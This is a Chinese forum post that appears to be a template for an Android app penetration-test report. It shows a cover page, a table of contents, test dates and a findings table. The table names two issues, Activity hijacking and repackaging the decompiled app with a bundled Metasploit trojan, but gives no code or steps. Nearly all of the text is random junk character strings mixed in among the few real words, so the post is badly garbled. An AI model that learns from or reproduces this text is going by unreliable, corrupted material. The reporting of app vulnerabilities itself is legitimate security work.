找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5384|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
) [# D+ q# r1 e' p, U $ B4 `% ~% m; @* {0 E( H) U I; r3 S

- D* W A" t5 V1 Z1 m 6 k$ I8 S) K8 J; F
0 ^8 S" u9 K9 I/ a ; k2 ^" f, V8 U/ {* q8 Y$ T

" M4 Z8 u t4 a0 o" j w : z& N( I6 i! B9 b7 I) _
3 G& r% C* d' u: P9 `# t4 j % b6 w1 l# \, ?

, B; S* Y9 W" T/ G: o, x3 r# d+ M; V6 \3 v, ]2 M& w# R& e! v 文档编号:                8 \( ?. C4 x$ r . H$ r2 G( A6 c- J0 b: `! L

& s/ t" H$ B- _. S1 a% H: H7 p0 F % E# {) n8 R6 ^5 v7 c6 o

% J) f5 B$ F% U$ I, W - X# z9 |# ?9 i! K C6 l3 B: n. a t   8 K) S8 E1 T/ R: Y - N" K- r0 h; x5 Z' y7 y

% X. b. L, r: V, J5 T4 S: ]& b # z, }4 w& d) H! s. ?0 N

) y- l. }+ X* Y . I' \! y$ g" l/ w: F; F   k8 Z) I! P4 l$ Z- A: L1 s9 u9 K" f3 p. m

' i$ x G3 V! v& F- u3 A& W3 j/ v$ _ o: V( b" v

" x% E* Y5 B8 r7 c8 K. i$ _6 K( n' E( M% {: h5 o" F   4 C8 ^1 G2 g& @( C5 _" ~ $ @6 Y8 [: Z6 L: n0 e6 e3 u; }

( g- X/ M. D R" w& b 9 y0 \2 A- j$ b( Z& q

% y4 _% m) d: i + B# H8 J' H; v# D7 h   5 q7 I( s* v2 [+ u/ i# [9 S 8 {) Z E6 J4 n$ v7 r

6 { `. u: ]: v" S, p8 D- e8 A6 p% [! T3 l4 f( K

" M/ M: q/ F, m* c% n) \ U% J / `4 h( u0 }4 f2 f   ! {3 Y7 h' F6 L. C8 t 1 [& p$ y, K) X: l( {5 f0 t! I1 ?

* r" f9 |2 \% g: Y8 \4 Q4 G; L ! P. k, ~+ {+ T6 {; y

9 B1 B5 h4 b! F& T$ W u' U . @- L1 u o- w# P0 h 某某某APP渗透测试 . K6 x. P6 `9 B$ N % M) N- P3 k/ N2 w0 c# b

5 {% [& M$ L% j+ ]" l0 I } # W J3 C3 o9 x2 M7 x0 f

0 }7 r7 i5 x3 A O4 Z " S9 }5 d$ @ f   u2 g# V! q( ]/ W( @/ _: J7 s5 |3 X/ x4 Q 0 F2 i" `5 N8 ] q

2 S' N. s$ c {9 f; z; }1 b& H: X+ W& h7 S- O

+ G3 G: q. E4 D! k- J; i* u2 l. N$ s2 m6 t1 o) ^3 s7 O6 N   : C( B/ c: |6 o5 \ # Z! h6 N/ `& E m

# N X: V4 D3 {) s9 r 5 L+ R5 f% u3 G& _

; @: U# O' x2 ~ u 6 F! z% y6 i6 _4 b   $ @/ n. n; U' O8 \& P6 t9 Q, r% v $ `( |0 j6 y; Y: e3 L& }

+ o9 n( W4 r; v' a 6 N6 v/ e! J7 n+ W' |

' W; K6 J8 b. ]' f8 r; K ) O7 |. U" Q w' |: \# d9 g   % D3 _, e% W7 ]% V2 f a5 i- | & s; J3 h5 U" N: R/ m

]8 d' c3 e. j, t3 y {1 c9 k! u: f4 }3 X2 g0 a

- u' U# R8 o% y5 F& r+ A # y e* V6 Q, [3 A6 e( g 技 术 报 告 ) ~( m5 C1 w5 P% S9 J4 L) t * E" d% J% g7 S/ Y

g: C' i/ n) C5 g' c9 k i, Y2 e5 R: X' e) m; h

& B/ g" Q, W$ _1 `+ a8 f7 `& K) O5 V" @; c$ R   & C2 z' L7 n6 A, C. S: d# C" [# F$ v/ {& }5 H! @

' X, w2 z- C& ]* { $ e- u% u5 y$ K4 [* v

# _! D C0 T2 p& f 4 K1 r! n" [# B' n* q3 x   + Y j7 _+ M, }1 U+ V& T . U9 o: {0 _1 E% N# r

% `; }, ~2 s( Z1 Q6 l, w @+ I9 b 5 N1 L6 Z- E b/ b

1 r7 {& M* ]8 z) X 9 n3 R" o) j2 q- O: C   5 i; o4 ^+ F+ D6 |* q2 K / ?5 g0 H: G: B- r2 M8 V; A

/ w( g. K. h8 U1 \4 ^3 w9 }4 k! S( O4 p

8 A. B! w8 O: j6 R* Y0 P 6 b6 y8 v/ S6 R; }- w   $ ^5 V# a- L7 z' u, `1 T- }: W2 K. U. G9 z" e$ Y# [

, y m; c% v# c9 G% d* N' G1 u3 h0 b, j

3 M8 B9 j+ ?; o6 K7 { $ ~; G, E3 `) W/ e# a   % q& R, \7 r, L( f6 h. P1 n 8 U) U0 q a% D/ X0 y5 G! h

# P' f7 y* C) }. ]6 j1 m/ ?/ T+ R; O# g

" I) m; v4 v9 C6 T x * M! L6 N |! P2 O   $ a5 {' H& A# e6 m& E% R' t; E ! r: X/ }# r) k3 Q

& ~2 k8 g% X) I- C' P 1 n: K! I+ X6 J r3 }/ i1 q$ c

4 ]2 T. A) ]: h; K3 Q a2 q" B1 O/ G& e; Y# Y   ( S" u* L4 N4 F% k: }; a3 A* m7 _ 2 N- i) u# {7 {- {4 u, _" `+ b

8 _. b9 x" ] Q+ p2 E% a, x" U, H# K- c$ u: c' K: Q

- c% ?$ }2 S7 y) H# S: V7 V0 L ! y3 H" ^& z4 u! I/ P5 p   ) r% ^( V7 S! ]8 V+ d! o 2 S1 n; a$ }! Q3 d. a; o- y. U+ p3 [2 n, \

5 K5 }$ w5 \7 A$ V9 @ 7 X2 d% y4 v. D7 I" T

- r0 Z4 g% J R4 k* g; ` & Y% ?" z. D2 l! T- s" f3 p   & _. G2 w2 v# V& `: Y2 M; R9 h" `, E # y1 H; I! i8 D" O

8 b# R5 A3 R' j4 k' b$ Z) v5 P$ }. O1 W4 v" m; l# k! E

0 q# h) |2 ~+ ]+ Z3 R" o- |/ g* c ! F% g; |' e& e+ }% ^& T! R   # Q8 x9 C" U; {" F7 ` 0 w% r: Z" |: L9 L- V! @, U

& U1 ?3 [4 O: \; M$ G; s2 ^2 ^ r) f; H

1 Q( T* ~ p- k6 O' v/ J, u1 ?4 U8 H 8 Z6 ]3 x) m! D% @   ; _$ H/ I, U$ x& @ 7 s ^7 }9 T8 Q8 G

+ g2 K' i: U, r+ C # y( q/ e- N0 M3 o/ c; l8 T# G9 c

$ |5 |, B* ^4 |8 [! V4 N9 }& O" Z L; G( R: c2 j y& W& d: \   0 t/ O; [. }: o- H, B6 R: V- u9 y4 ]1 G* \$ ?; p% w

, B" x& P) m1 P( w1 D9 v1 O [2 d) G8 ^( d8 q- A0 K( }

_5 P3 t1 G" Z% x6 Z0 x * X3 z: @$ [( k6 H5 n   0 j9 F _8 p$ I# \! `; N ?5 c% } / l. A0 l# y/ G' E, g* j

; i, j4 l- w2 h " W: b- y6 A n# E4 g" h/ E% N

9 K3 W" z. H% }5 y4 v+ B# u$ K, h# X3 V3 [# k8 z' r r6 `2 T   3 a- {; [& }6 K- F& \4 u& h % \( T) Q. L# J |( j% H0 ~6 F

$ ^' D# K2 s* F g : j3 e6 q: D K( B1 g

5 e3 B+ `" Q6 [" X + M2 q5 p K! F& n* u2 M- j* w   4 }# J+ f5 ] g3 k+ G: _# F' v4 p" n" m( R, e% s1 b! H

/ z; H f- p' p3 s9 y8 R' I; R* P( _, q. n) T1 ~4 M

S( K/ Y0 ^" @0 y# o + y9 f" F6 p; T4 O( F! ^0 g   8 P# q- k+ h0 j# D& g; n3 I4 @7 i0 u+ F) S, R* H6 z

7 d/ e* H2 \% ^$ Q/ y; a% W" b# y/ V2 {* |" U8 p

`7 o' \, l" E6 A0 v C6 y' x5 B3 k# Y) U+ { v   ) c4 j8 \' f4 O; X, L9 {$ S2 M; ~ 9 \1 C( H* b* r/ Z& c+ a$ Q

2 E/ o" K. k$ e5 S ) p6 {( j9 ]* C3 v+ p* z, n

: o! A0 O( j, {! C) C' `6 e' A & N: w9 q! {; e- X. H4 Z, C   & D9 j0 C Q# H1 @; n4 [ V. o; @. \

' |0 B t7 [( L. ]! \" T& z/ C: E! w: _/ k$ C

: `5 J- u& _/ B9 s# i. y! l3 Y$ p 二〇二〇年 ' a% z# A3 j/ W . a& \0 P* ]6 V9 r' R& z! d3 f; k# O

% L1 ? h2 V, c; f" d: n N. Y: z5 J! R0 P& j1 N
$ x$ S+ b$ }2 Z+ |% {; l5 i) ?0 t- {* b6 y4 P" a/ T0 _
( Z2 ?5 \7 c9 S0 }8 \ : b4 p" q( A R' r1 U3 p! T * Z3 K) Z, S1 z8 o: L1 ~7 q / E/ E5 U) K( m
1 t, K$ u- S' v: C 3 i; e9 s+ X1 P2 |3 l! ^7 n$ ]/ k. |
! e) c# b$ b! N' A. s$ P" N- j7 B, M2 s4 v! P1 V
) g# a7 }& Y1 H $ \& X2 Z: F' @+ Y6 Y a+ B, g. q+ {! H' y2 M $ R* M' Q' x, b5 v6 Z& z0 y3 Q
3 t+ k1 b9 J* W! _8 R3 v( n( g/ C/ E4 E) v4 F

' ?& X# @3 X; q2 a& ^ c) h! y0 W" z) R 目 录 0 n5 |# ?* r3 I/ q3 X3 Q3 L5 v) x: S D5 \

4 }7 e# a. ^+ N d* N 8 J: ?* J& F+ w; Z ) L5 V# [1 c6 @0 a 8 C$ i; M- L% i: t3 T1 [0 s3 A

Q7 A# r1 Y; b3 ~7 R- X 1 }/ r% r' A" H: X   1 X8 p. D) s3 K6 u( A: G& y: j 9 w9 _# l0 I6 Z8 [% k0 n3 m, J- A; D

1 ]4 m5 R1 S3 M, L# t ~; i: Y) | " P# r8 h @, N. t3 F( P

7 z; z. U2 { Z( u+ [; v # Y3 z) U0 v) p: Z+ y 1 概述... 3 & M" h- d, T- o) V# u* Y: h 5 m! }0 l$ u5 M9 M

$ p( b0 c; c! C" u. k5 | 6 N2 m. b# `+ n: S) z9 K

5 E8 [# E5 y% [5 q0 |& `1 F* N3 \1 Z+ e C, C' C 1.2测试时间... 3 $ q: P5 H0 }; r0 N ) h' `- ^$ P8 i% j7 q

, Z/ c' |8 d& R |$ O9 o) k+ s$ s9 h

% o' P7 @: h% v' N+ a ; _; ]( [3 T* i5 W 1.3测试对象... 3 ' C8 {% X: f; T 4 x( }7 L$ P2 r2 ^4 l

" J+ z" u* u7 ] ~1 n* o/ S $ R( {: Z+ i- t' \

3 g: L2 N' f* u/ o! `, B9 r; i% t& }3 y: m$ i; v+ | 1.4测试结果... 3 # q3 y7 ?8 S2 w5 y* D' |' F 5 Q& ~: E9 z' o0 ?# I2 H6 }

/ w4 U1 A6 s" H( C$ X7 N' f8 H! R; {. L' m/ q5 T

+ `: ^! T; L. |7 D& | 9 z% K; u6 g; k3 ]& L! J: x" r 2 检测结果... 4 . x+ u6 t# \& h' L) O ! o/ w& g" o f% x# ^9 L/ y# Z

6 R* [ z7 X0 ~5 O; ^: V5 D & v8 T3 E/ ]& Q0 {- f

: J7 s: e4 C6 i, j. I 2 g4 k4 p# ?1 g: G; }; X1 r2 v 2.1 某某某... 4 0 J, A$ f1 A# m) n N: N7 z! {+ L; `% _3 K9 e* N3 n

7 X2 o" O; e) H) l; Q. f# y8 A$ a) \ V( m) o

# f( L( ]: ~* Q/ q & n" j: W% C1 }0 t2 }% I1 A 2.1.1检测目标... 4 - G. ?' Z- [) t 5 b3 `* Z0 x- E( m% S6 n# q/ N. m* w4 n. }

/ }6 D$ J: c* J& O6 r& G* q, W5 U' c$ y& v9 ~' Y

2 Z$ @0 J, W" b # f Q F9 \+ P! x 2.1.2检测结果... 4 4 P ]" R% G5 T, c# c+ _- t; X ( D% _4 r0 E! T& l: `0 v% W

+ }! y; n& `# i: m% J8 z2 u+ G; N' j. g" a/ W

- Z a0 m1 S6 K ) ?# y' A4 b, A! k6 B* Z. o 2.1.2.1. 4 ; ]! Z, w2 h+ ~) Y8 G5 _5 w $ R$ ~. ^$ e' J

/ s7 _ k# r7 v! D+ z# E9 h( @; ]& c/ m- S8 Z6 x6 L" @" I

/ O+ [4 V2 C% ] 1 J/ r2 g; g8 E/ u$ X( B: X* I 2.1.2.2. 6 ( O$ F& s4 J0 @" x, t7 D" z5 w 0 g7 C1 N4 H7 e9 `0 B6 G

! I, H {7 f7 x+ v + S+ O0 ?; f/ F& S: O

) e. F, Q: ?8 }3 z % @& X3 r7 _8 T. q' D! @6 e; V3 @7 u 2 m+ h4 b ?8 U5 v* f0 t& n, d 5 g4 g( N/ X/ a: g3 T! B z

, s; I: S( _9 t8 {- D; i* T) S/ E/ ~* w % F5 C) Z M( q: M 4 K' o& }; L v1 n
7 Y0 c7 ?0 R8 P1 p2 ^2 H# t$ Z 0 y# [5 N% G' B7 V4 y
! w. N' O- @- w- o: S/ {% G6 }! r8 o " |' h8 X5 E! Q r! J& m # P P8 r S P7 k 2 \. t2 k3 b+ y0 e

" \" b8 W5 H" b% |" _- y 7 Q, ^; L. w( \0 w9 l 1 概述 ) P" f- \- f$ w3 D& L' b - v% k; K) B: t% a7 i ^) z

* v! ?) p2 N0 Y! F$ b2 X6 V" H( R 9 l/ A) f; a( h# D; W# `

" A5 m# K. s. c3 L1 ^8 t4 u' k- m. _- B- n 1.2测试时间 ; p: W" U3 U% D ' h0 a' a% x, j3 b% C: j$ e* T

, `9 Z5 S1 F3 @# x3 U/ a % b$ r+ f6 y) ~, ?2 Y2 V 1 X+ _0 S2 c5 [9 E3 o- L0 Y9 I% ?. i0 g; x2 |. Q! |9 I& |8 o, m/ _5 A" d9 Q3 C- p8 d d {, g, ^+ C5 X; Y$ _: i$ e2 D* @3 i6 o, f5 T6 K. _. c4 O( k. i; x6 x1 G; S) v% [% ~5 z- J* Y- O) u% [$ x0 N* y% V F/ p' z2 P. k# T0 H; O8 a, T1 @# c! E' k! C& `7 m9 O0 {' M$ x1 w& f. a S+ S3 O. }) ?: M. @4 S" I6 {+ D4 ^5 z' U+ [9 h2 e: Q; B' u5 F8 ?6 F7 P* K5 F) ?2 ^/ _0 q u6 E0 p) U) ?9 `7 F+ b; V: W* m0 v5 E7 F3 e) [) f4 w% ^0 {; M9 _& a# W- e$ W7 n' N% H3 p) u6 V) u; \- j. `" s' U# X1 U- `% c- B+ o& g( j8 [' A+ t$ g1 S9 ]! z7 P) k, _7 d% z! r% x" u" q1 K- p. d; h, P( \1 [0 @* X3 m! G. H9 _& t( K+ _: e4 r, N
. d" {! {; z t1 P' ~7 k / ^; S/ h+ r# @0 z( _% p

7 u8 m: r: s2 A# X5 W2 _ . ~, x2 ~$ E" O8 z- i 渗透测试时间 : u( b) c6 y( k; m s; K, L* i+ f3 C' X$ U( G3 P3 e; t; Z

5 D* w3 ]- m6 [: j- I , H- E, Y2 _6 R* O O, X
+ I/ o* p; v; O$ g5 O5 t0 h( p & @1 { w7 q3 p# b. L

9 K# h/ l7 C" U2 g* w% k, h6 |5 O- e 起始时间 & z6 n- W; Z9 m* T: f2 b: `- _+ @ ( D$ w, ], K+ Z9 ^0 @0 X

! v$ f$ s* n1 M - R& {: D5 |. o' T+ Y3 a( k& m 		! z# d2 \' O2 w5 H ! c6 j; C0 j [- z1 j

/ h9 J) A7 Q% B5 C( M2 e. ^ b* g$ g3 F5 E; U2 v/ c! K 202046 3 F, K( _( O+ n ! J1 V: V5 [$ i q. ^* n6 A

1 Y! y/ y' s6 ~% v! {7 r 3 v, @* B7 H) F
. N$ o0 V$ ]) _0 @1 l; W) g/ e2 e 9 e" O7 a2 k# P" y; u

8 }( t; D @2 T$ |! ^9 ~. q& E: ? 结束时间 , z+ S) v. `& u " ~5 S$ s; H0 N4 z1 W; x

& C9 j+ B5 {7 V' G7 I; o / O- J/ a0 C( K3 q5 Z9 [/ ~ u 		; [8 i1 W! F8 `2 @( c/ [7 I " n: e9 B+ Z4 N5 H6 _6 ^" S

5 c/ q R9 T2 n) i6 ]. o 5 h! F$ S( f+ X1 n, k7 c' x c 202049 / o* V5 d" ]! ]) V$ Z8 D& n7 Q3 E' K

# W. O! K/ `3 @% b: C9 {$ V! o4 G1 M: ^3 g9 A
* y$ q9 u) N8 x9 Q% a 3 |/ K+ ~3 O" b

) `* D6 }8 y, x2 Z" [ 7 c+ T( V) L% q- h$ k4 q 1.3测试对象 * n4 Y. d4 V) Z8 {! A; q ; {( L, D8 R# O: n7 _; j

! {% g8 q6 F3 d( F 1 z$ i! Y1 j4 F( J

4 a: ]- N# ~7 a& E5 G$ q+ ~: o# o, Y" P! o: k& e 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ( @3 Q1 t- a+ h. z# d2 }% I- q% _ & S' {# }* Y B: z8 a

8 w6 A8 O8 _' q( Y6 \ 0 g Y1 D0 l, }: P

& L; Q: ^: V. k7 t. d. Y e% K+ P s. ? 1-1 检测对象 / a. m5 [* ~0 e0 e3 K/ M " p! s8 E$ W M2 C

9 I. W+ H0 H* ^$ H3 O; R& b% ^" u' t3 Q7 _% I3 Z3 L# @, _ * X, D$ I- \' E/ J" Y5 V9 p/ v/ S. D* o! t& P! c3 j* V0 W- W8 w Z: k3 z6 x' S ~4 n4 L0 q, X+ k% {9 g% {8 t$ T# g1 H9 F# S# Y; O" N3 [4 g. g y# \% ?& r+ X8 E0 A, y; M5 \7 ~( s! I" l9 l2 t/ v- N7 t8 M2 ?4 Y6 v( l; O0 M7 x8 C( } X3 ?" S" o- V% h ~4 |, w8 I$ y7 h3 n; f+ \0 U5 a# N, y$ T) @+ b: G/ ]7 }- C0 s* W( S' v3 v0 w) Q2 x, X: e6 _* x% c( p3 D+ ~- y# ?3 U" x! k4 e- o- R2 ~. [( X9 W& C4 |/ a! x8 S5 B, L3 a U+ g ~% V: ^ V9 t( y+ c @' G+ \6 I: i! O. X* g3 i, |* {) y7 L5 E8 D# W. K \- U2 v( z" p3 n0 r+ T3 y, ?& ]! O+ ]0 n$ w9 h/ Y' C: L# j# p. n9 x, }6 j- v" j' b) B% \6 `6 i0 y# h2 g7 L1 X3 ~- o! L$ |- i8 l3 o4 K( t; B: i* U" v5 B; I5 U, x6 u+ b; K3 I/ G& S4 ~ d- K( ~1 F1 B
" e. }2 |9 Q6 H 4 i1 @+ q' M8 z, r$ F% c$ ]/ e

# r# a8 E/ P+ G. Q6 N 3 H6 A2 ]) P6 R" D' l3 S, I M 序号 5 n; q6 x6 i u% p# C1 H& E0 [2 w) A$ |4 c

! u% G! F3 \) O) E* K5 U ) J" U5 s) k4 w! m B 		; r% U, h& \5 b) T. P% g " C* L1 b7 S$ N, j+ M. n

$ V$ ^3 g7 i% z+ @) q5 z/ V4 B$ O* C& O# G, R: s* x8 h9 X2 L 测试对象 0 M- q9 ?/ P: `* a L9 D! Q 0 |8 {# b; H: H

' W. n( M1 ]5 Y0 A- s, m' {+ f0 j6 N( d* f7 d3 Z+ c4 a( o+ h 		$ l9 L! p: d$ N" \. Q' x( P( ]5 i8 \' b" j+ t( E9 y! }) i/ y. W& t

8 q, A7 j4 }) g, ^% W+ l / K* ^! q) h! a1 `6 V, Q 测试地址 . y' F1 d ] H- S# x 1 r9 U1 N: y# @7 \, o

# Y( _' v' {9 Y5 b6 ? $ q6 F( G) ~3 G/ e, e7 d u& ~& X 		( R1 x7 e' u. u K% L& t0 `' r % C+ e, q# B/ a1 [! R) v. F+ _2 B

4 N7 ^9 [" u2 O# A C6 m" m) P9 ]* e) Z$ z7 J( ? 安全漏洞 % g. f5 c: P# a' q. R - V, U. a& M! S4 q

+ ]' u- y( V$ U 7 }& h1 I0 Z$ Q- o
' w) L' |* L4 z+ X6 ]( v; \* u- } 0 L* a; ?/ b- c. L# f2 |4 J2 {

% p5 ]4 m Y7 Z5 I1 J 9 I! t/ M1 k, Q6 o7 L 1 6 M! }5 J# j7 @3 b9 r6 N1 _ # W& ], ?8 x7 q W

n* `; b3 X8 Y+ l% { ( T9 Z$ V6 D( X% | 		/ }& |8 k' o4 v- M- b ; j) h. @* q( ^$ B( S

. }; S; y- e) w) u6 Y# X# f+ s 7 n7 c+ ?6 o( o5 J1 k W: o 某某某安卓APP 3 U B' X8 n. W! k' @) K- j% H! p$ l! g Z7 ]: S6 e) ^3 n; D* m

9 p6 q: ?/ y& b s- J! ?* {/ C- Q . d' Q: t" \7 N- R 		0 e2 P2 s4 Q7 C' E3 L . V. \9 B9 \& p. \

8 z n5 k% x+ {$ _& o j ' l+ s$ ~. Z: A6 l4 C3 K2 _( H   - I; `& Y P8 z : E: ]5 j( H1 k. ~

% n' E! {$ `4 y/ u5 N ( } ?; k, y9 Z7 I$ n3 z' x( u7 Y9 x 		2 e3 U( `$ T e1 } % K. M' d- Q2 g1 N# i

( ] P. t; `. k7 i9 _ 5 o* d' l% D/ h 2 # ]0 b; J' k2 B( y, g+ w 9 E2 ]# y8 p3 U$ v6 D9 c

) i+ C* M% ~0 g# c& \ / ?* U5 ?( l' }3 P! X) \. k
3 ?2 ^) k# e+ n) {3 W& D% t: y& l ! T6 t9 e5 [2 X( D) q {" J

7 |0 j( l( }$ A / \' l4 B G* n4 n 1.4测试结果 H4 t1 T0 ^5 g1 j$ e- t 0 K4 @% C' a' |9 J; m/ A8 D

) s" v* j4 p, h& I- { 6 c) i) e+ f1 ^* t$ {: @) l

: w B" n' ^* o1 _4 s/ j0 l' U! T! n% _3 r) W 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 8 \1 x; U4 ~3 {, c 3 u6 k) W2 R/ v& w# V2 [

* [( `2 C$ N" m 4 z% Y9 ^* N! D/ j4 c/ b

f8 t. W5 W' M4 E$ D 8 D; H8 a% M/ h% Q; X   , O; k' l/ m0 s" v! ]% ^' [ {7 | 9 U Q) j* [' C

! U% U) P' `- v( F% {" r : B' |7 s, S3 V: }' s- J3 b/ x
- r$ M9 y3 R, ` + J8 V. i" n& N8 Z# ~% B w & ^4 `3 V1 R/ i, q: V* C2 L, E3 h! p& D# d+ k P: ~5 d; j7 _5 F3 N5 ~( C# n5 b7 Y) G# k! e3 g4 v( m( e, ]/ [& {7 Q( `% V s# l4 Z, j. m" y! Q9 J$ L- V& l0 D+ V" a, Z! k9 Y# r+ h$ {) R6 }* B3 {( s6 M, h4 g$ D9 l+ X" z4 g9 ]' g/ L8 `& @+ p0 T% R2 j$ J6 u# X7 l3 z; k' M4 o9 m6 @, |) N- w n6 S, i# }3 J1 k& A7 C: f6 I S4 g% b. v0 F5 t. d* z# V1 ^5 z) g: n6 c6 B" y. l2 R5 w5 ^' g" U3 A+ y, i# X1 Q. @8 _3 V7 ^) r: c( w+ h$ d% w+ B8 f: B& c/ O+ w4 w2 b' U6 } I3 t* { B! I, q; _+ b& I9 }7 R5 c: \3 u4 t; P1 ]$ L: a5 q$ o. I/ p/ n3 R6 C, R% B3 w# f% y2 S1 O/ n7 W3 z& q! D8 q- }: t9 n; W4 n* {3 Z* V: J9 {, w* ]4 r: s) T" U* t, ?) }6 ?0 f. y# _3 ]8 L5 ?) P; y6 u R, O6 I' ?3 o( r( _1 ~$ E) C1 N2 h" j* u4 @; o- ?& {! ]% s% A9 L3 D- }! T2 |8 ]. \6 {+ W" H" w! c3 Q! W, \. B. v6 F1 }& X) y7 n# ?. |6 G7 t# R0 Z/ s' v+ x* o$ D! k* @ q5 l# t/ {! u- T1 f) u' b) I3 a8 g# |( e* `) S3 Z0 K" T2 ~3 Q0 S& p9 ]+ e8 {) M& w5 E$ d6 w/ {9 Z+ m5 M1 u! N1 V* _* r7 N- g |0 [3 m$ o K. F$ r( p# z2 W! A1 T; |; H1 ~0 Y- I5 t' E8 o7 y7 J: I& S! t* c5 y- d$ m6 ~( o+ \; c% z- i3 V" Z2 Q! b* \; G& y O% C# }# \! X7 t: c" Z. m* b# H7 d, x! ]9 c; }* |' e! D r5 C6 ]! O! u8 e0 @$ O0 ^% k
1 Q4 ?$ t/ Y! ] + _+ Y4 M2 B6 B, _/ Q

7 X+ r1 C( v" V3 Q: Q8 F 7 G5 `# ^& ]7 Z, f! Z 序号 . D) k; A2 ]" m$ l( `# S0 @ 2 \8 w' J! ~% o8 q1 _

) i' _3 z) ^4 W" V* i( H9 Q' l ' S& f& z: p8 @2 Z2 w 		! a6 @+ a8 h( @% B2 B9 M5 h . D0 P( b3 M$ U2 |( s

9 N! m; e1 ]1 V6 z" W$ I$ `4 g8 Z) b" l7 S7 C 系统名称 7 {9 J$ u. ?/ p2 ~5 A% E % {& _$ J. X9 q# a/ M( q3 _

5 w! X9 `/ f# M8 u3 G; Q$ k4 ^) F( Q- n q) K0 v% i 		9 \; M4 o! Z4 ~ J ?- K , R$ f: K( f" }* Q; O# }9 q

2 s: u9 M u: @3 \' R: }4 I/ {9 f- U ) F" e' o2 \0 T' e v: u 漏洞名称 0 Y6 k$ J: _7 `& k4 m K4 T& I% s/ C* V; |

7 h1 Y; P; K! e8 R1 t7 I. t" N8 t& U- @ 		; B2 H5 T0 k2 x: ^$ j# q! f w' s, k; ?4 J& U0 ^; r) v

* L4 k% X6 l7 I# _: @6 W4 c0 R3 ~ 6 `1 F/ v+ ]# E/ ] 漏洞危害 . |& j `% j+ A c8 Q. K+ y5 E- f ! a8 x" h7 |" q/ a/ @# S+ B

6 v; s, K/ k: Y& | [5 ~; \ + j* G$ V$ n4 z4 [/ o 		: K* |0 |5 r3 I/ Z' K7 ]% N' ? ; u9 d3 t0 P2 B8 F, O! P

( b P4 i4 Y& q$ | 8 i* }5 m# H. H5 O" [# F 修复结果 , P& I- ]! c0 r) p" g ( V0 Q/ @5 A5 A2 S. I

& J7 f( G: e1 S0 h, h" t1 o" @ 8 k" k9 K- V8 M. P- a" A
( h M8 U' d/ K* _# j7 `, r, O ( Z! `6 i1 s1 Q. l3 Q/ t

0 }# ]5 f. R c+ H& g. {- ]. B: B6 _3 E1 w3 V/ p d& S 1 0 w) X( z6 w% W8 Y+ [' f 7 ~, z9 n* @) W% L x. Z+ I5 I

$ }( ?3 h5 F9 a$ n$ }9 B+ o / l4 S: X$ \/ d- ^! Z0 a 		& {, v! O3 l w! |1 s $ L" [4 v* }( u( L/ m8 g

* Y3 u! E* G, k6 C# z: R6 d( Y ' H/ b( y% ?% ]& q& S1 K9 I1 m* G 某某某某某某APP ' }2 c# T. \- F% |) e8 x7 h % D- u* g$ k1 _, o" a

# W. k6 N& u3 l9 n7 o ]; L. x / g S4 C3 J* f2 o 		2 `. r" h* f. \" I( }; k) Q {, y) t: V5 `0 {. x

w- x- U7 z' {. [+ m # S! E A- d6 `' ^# v Activity 劫持 7 J9 `, g% r: f' R1 G: m, d/ s; m: X2 l( S8 F" @

U3 W5 m0 g& q: q& n$ R0 `4 T ^" |* X+ \

% i4 N9 p1 c" g: `1 O# _( ?- r5 U9 x3 M   ; x# O4 l p/ ? 5 u4 \# s% h q4 p2 r7 X

$ V$ x5 n9 y- \$ J) l6 k # `$ G6 u, w# y: c- c2 d 		/ }* ~' B6 c, l' | ; M4 h6 T4 w- o3 _$ v; o

2 D( T' g0 o1 U# C' x2 }# A! p$ y( L 9 Y3 {/ \! D7 w! h% L2 Y : I0 |! R: g* a+ U& m4 z

4 H! i- c1 V% f + H5 ~7 I4 [7 y' Z2 L4 v1 { 		; K1 M" ?" }2 @0 G1 u 0 ?6 G0 E" a) O9 Q6 g; b

: F5 k7 @% g2 {. H 7 b! d6 t l2 l j. N; _   & B8 G2 e8 p' u' w, w7 S / H6 o' b7 U* @" L

; m* q, H7 @- Y. h 9 ~9 {1 o6 A/ \2 f
; z) e# g( g6 Z3 e : ^, p: b+ Q1 h; [/ l

1 H. z/ e0 k5 A5 B+ k) E4 F+ u, g: b6 n& s 2 1 y( l1 h) q" ~0 a+ J% @0 Z- J. X ; e* c) P& ]8 b% M& ~3 b! a

( c9 u) W; ]2 S( M2 p2 c % ^# c" h( ^+ `( Z6 O 		5 ?% t. U4 f" \, ?8 a - U, y, }7 p* h3 k( K

) a8 S3 Q8 g' j0 Z1 ~+ [% c' S& V9 m# ~' A M* N: t: O# }! S# P 某某某某某某APP 4 n- s' P4 b: D9 W, E/ M - M' ]4 p& f% w9 B

0 |) `3 H, F$ C" K9 v5 c; T) a 6 r! f/ s1 J1 C7 ? 		' q" ~! G4 \8 K, T: Y6 o- b 7 P% A5 E5 |! z/ \

0 h; E# |: \9 ?5 Q/ J. s& e2 H 4 W+ k c; K4 A 反编译二次打包捆绑木马、篡改APP代码 : {1 A+ L |1 J3 m3 W$ D' V ' F6 k2 J/ G/ ?( n1 ?! \9 |5 d

) S4 ]% ]8 Q( G" D2 z7 K7 p; o* h2 H : k! y- G5 f& w/ Z: t" u 		( S* f6 r7 h; I' w2 F# |: t6 _- p8 |

5 _- }# N& Z i, A4 X) L $ p- g5 q, h' [: f 6 E- `/ f* Q! Z6 B( z7 e K) ~* I+ w, }4 ~

+ R6 T* U0 a3 J6 C3 n$ D1 r2 k" o3 u$ m3 b 		( x2 Y i; t R4 Q ! Q5 l/ Q8 Z8 L- [; g+ t( ~

/ c, W1 X( ^: b5 D1 M9 P, \- b0 T % p$ T) d6 U$ }* ~: T   ' A5 T$ u6 g5 g' a1 G1 N: P) d1 ~* @" h

% _. M, Z7 b1 T& b : `+ M0 G( a6 Z
; l R$ ]( x2 A4 l/ [1 Z; D+ q8 a% ] r
8 }& F! P' F8 o& Q4 h. b 8 ]! v7 Q% _" o9 G

7 Q% ]0 e! v) k& w" B9 e( H0 J 4 G6 v7 }$ J; E9 J   8 T1 w! h9 c5 n* j1 X$ D; b+ c$ c, T; r: K) M$ u

